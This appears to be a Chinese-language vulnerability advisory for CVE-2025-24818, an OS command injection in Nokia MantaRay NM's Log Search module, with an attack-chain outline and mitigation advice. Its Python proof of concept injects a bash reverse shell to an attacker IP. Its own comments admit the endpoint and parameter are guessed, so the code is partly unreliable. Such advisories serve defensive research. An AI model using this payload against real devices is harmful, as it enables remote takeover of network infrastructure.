CVE-2025-24818 CVSS 8.0 高危

CVE-2025-24818 Nokia MantaRay NM OS命令注入漏洞

披露日期: 2026-04-07

来源: b48c3b8f-639e-4c16-8725-497bc411dad0

漏洞信息

漏洞编号

CVE-2025-24818

漏洞类型

OS命令注入

CVSS评分

8.0 高危

攻击向量

邻接 (AV:A)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Nokia MantaRay NM

漏洞概述

Nokia MantaRay NM网络管理设备存在严重的OS命令注入漏洞。该漏洞源于Log Search应用程序未能正确过滤用户输入的特殊字符，导致攻击者可利用该缺陷在系统底层执行任意操作系统命令。攻击者需具备低权限且处于邻接网络环境，无需用户交互即可利用此漏洞，进而完全控制受影响系统的机密性、完整性和可用性。

技术细节

该漏洞位于Nokia MantaRay NM设备的Log Search（日志搜索）模块中。其根本原因是应用程序在处理用户提供的日志查询参数时，缺乏严格的输入验证和消毒机制。当用户输入包含Shell元字符（如分号、管道符、反引号等）的字符串时，后端脚本直接将其拼接到系统命令中执行，从而触发了命令注入攻击。

根据CVSS向量分析，攻击者必须位于邻接网络（AV:A）中，且需要拥有低权限账户（PR:L）。由于无需用户交互（UI:N），攻击者可以通过构造恶意的HTTP请求发送至Log Search接口。一旦利用成功，攻击者将获得目标服务器的执行权限，能够读取敏感文件、修改系统配置或植入后门，对设备的机密性、完整性和可用性（C/I/A）造成高影响。

攻击链分析

STEP 1

1. 信息收集与访问

攻击者位于邻接网络中，并获取了Nokia MantaRay NM设备的低权限用户凭证。

STEP 2

2. 载荷构造

攻击者分析Log Search接口，发现其存在OS命令注入漏洞，并构造包含Shell元字符（如;或|）的恶意载荷，旨在反向连接攻击者服务器。

STEP 3

3. 漏洞利用

攻击者使用低权限账户登录系统，向Log Search应用程序的API接口发送包含恶意命令的HTTP请求。

STEP 4

4. 命令执行

服务器端未经过滤直接将载荷拼接至系统命令执行，导致攻击者注入的恶意命令在服务器后台运行。

STEP 5

5. 权限提升与控制

攻击者获得Shell访问权限，进而可能提升权限，窃取敏感数据或破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2025-24818 (OS Command Injection in Nokia MantaRay NM)
# This script demonstrates the vulnerability by sending a malicious payload to the Log Search endpoint.

import requests
import sys

# Configuration
TARGET_URL = "https://<TARGET_IP>/log_search_endpoint"  # Replace with actual endpoint
ATTACKER_IP = "192.168.1.100"
ATTACKER_PORT = 4444

def exploit(target_ip, username, password):
    session = requests.Session()
    
    # 1. Authenticate to get a valid session (Low privilege required)
    login_url = f"{target_ip}/login"
    login_data = {"username": username, "password": password}
    session.post(login_url, data=login_data, verify=False)
    
    # 2. Craft the OS Command Injection payload
    # Attempting to execute a reverse shell using bash
    # The vulnerable parameter is assumed to be 'search_term'
    payload = f"; /bin/bash -c 'bash -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1'"
    
    # 3. Send the request to the vulnerable Log Search application
    exploit_url = f"{target_ip}/api/log/search"
    params = {
        "query": payload,
        "module": "system"
    }
    
    try:
        print(f"[*] Sending payload to {exploit_url}...")
        response = session.get(exploit_url, params=params, verify=False, timeout=5)
        print(f"[*] Response status: {response.status_code}")
        print("[*] Check your netcat listener for a shell connection.")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_ip> <username> <password>")
        sys.exit(1)
    exploit(sys.argv[1], sys.argv[2], sys.argv[3])

影响范围

Nokia MantaRay NM (具体受影响版本请参考官方通告)

防御指南

临时缓解措施

如果无法立即修补，建议临时禁用Log Search功能或将其仅在内网受信任的网段中使用，并监控系统的异常进程和网络连接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表